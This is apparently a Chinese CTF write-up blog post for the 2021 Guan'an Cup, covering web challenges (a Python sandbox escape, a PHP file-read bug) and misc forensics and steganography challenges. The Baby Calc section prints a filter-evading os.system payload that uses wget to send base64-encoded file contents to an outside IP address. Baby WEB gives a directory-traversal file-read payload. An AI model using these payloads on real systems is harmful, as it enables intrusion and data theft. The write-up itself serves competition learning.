Ca1s1'Blog

观安杯2021 Writeup

字数统计: 429阅读时长: 1 min
2021/09/05 Share

WEB

Baby Calc

1
2
3
4
通过测试发现该环境为python3沙盒逃逸
通过网上公开的POC发现存在代码执行,但是无法回显
尝试反弹SHELL均失败
发现系统不存在curl命令,但存在wget通过wget命令携带回显带出到vps

如下图使用wget,把命令包含在``中在使用base64带到vps中
1

1
POC:expr=__import__("os").__getattribute__("metsys"[::-1])("wget%20http://49.234.223.23:1234/1.txt?data=`cat%20/flag_is_here|grep%20flag|base64`")

vps监听:
2

Baby WEB

1
题目提供了源代码,查看incloud.php文件,发现57行存在file_put_contents函数,且password未做限制。通过构造poc使password造成任意文件读取漏洞

-w1134

POC:1|../../../../../../../../flag|

1
2
注册任意用户名,密码为POC,登陆密码为1。
登陆后返回flag

-w552

Misc

老电脑的内存

经典的内存取证题目,通过imageinfo来获取该内存镜像的摘要信息
-w966
查看缓存在内存中的注册表:
-w996
获取 SAM 表中的用户:
-w1005
查看内存中系统的密码:
-w969
CMD5解密
-w909
通过filescan查找ctf用户下的文件 发现1.png

1
volatility -f Windows\ 7-c0e05742.vmem --profile=Win7SP1x86_23418 filescan | grep ctf

-w1002
将1.png dump下来,查看文件。与密码结合获得flag
-w915

-w997
##被加密的wifi
通过分析数据包发现key为88888888
-w528
通过airdecap-ng命令输入密码解密数据包
-w695
在已解密的数据包中找到flag
-w974

release

拿到一张图片,首先使用binwalk分离文件,没有发现有用信息
-w696
通过winhex修改文件高度
-w813
得到一半flag
-w805
翻到文件底部发现很多20和09,想到通过二进制生成二维码,将20修改为0,09改为1
-w854
使用脚本转换为图片,得到二维码
-w826
扫描得到flag

CATALOG
  1. 1. WEB
    1. 1.1. Baby Calc
    2. 1.2. Baby WEB
  2. 2. Misc
    1. 2.1. 老电脑的内存
    2. 2.2. release